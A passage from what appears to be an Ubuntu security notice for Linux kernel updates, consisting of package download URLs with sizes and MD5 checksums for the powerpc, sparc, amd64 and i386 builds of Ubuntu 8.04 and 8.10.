http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   387992 53b23049b6f79a9609349927adec3443\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5:   657530 98dd4c49966d886237bed19fddb84057\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb\n      Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb\n      Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb\n      Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   266748 d71a805e23acc800f21449d312975e04\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   201688 94056840984e621b385099d261ce2420\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   199752 9d4225f0960410c78279f61aa02471da\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    46836 10f5de3e02406e28d373098a6613860b\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:     8486 80580934d5e5f6909c396732bedf2055\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b\n    http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:    83682 bcafd92384fdae95293c310f83443303\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb\n      Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3\n    http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    22356 aa2c6396604a45f318881df2e562f625\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f\n    http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb\n      Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb\n      Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb\n      Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   270064 879ee6667df636551d565e10ae5162fd\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   175444 37239b1899dd449d5b4985163c46d678\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    40398 81325db98acd64573c100455f0cb5289\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb\n      Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz\n      Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc\n      Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz\n      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb\n      Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb\n      Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb\n      Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb\n      Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb\n      Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb\n      Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   186500 940e6b351f4975369720543184596a04\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   168150 696ed64f02936c7200cc9a468302de40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    68544 cd2e39978716c3448e54d6862877957c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13480 5299f432e2db456a3e0743fd786c18f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   393936 83cfaf207498b9a60d4e97cd21309095\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:   200806 5dfbdf4ce61cbe469582c94509160a42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb\n      Size/MD5:    13614 c860448fa643364e8776a4947cff9714\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    33948 74da15b4b68dc6a03f2da65175b021bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   244732 aee21df42a017731c52c53100cbf2f20\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    55398 f4d1c18a70aec1e3e39572c36318115c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    41206 42a8188a1ad868fa58aa779b31908d65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    48698 7e06c0fbdb39f426e1259d35e8f1505e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    86942 49099dad48131ce191b10c154f096d6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    34064 c8cf2cb88451687abb047df2faae44f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   675492 3e953f324652ef7a01f93aeaa2dc5e55\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   158402 aa593e2736e7b717ea8c561b1e11c27b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:    43624 b2ca8774a7cf447123ea811781e80dbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   145226 0fbb95dc0bc59baf91447250f19e7d45\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   302390 991c8e4ef2dda71d6deda5599129a768\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  2436572 4b845d0a28c2b48ad0c29521bae3a0b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5:   645046 28f8ea5f653057c350d40feb64d68f2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb\n      Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb\n      Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb\n      Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb\n      Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb\n      Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d\n    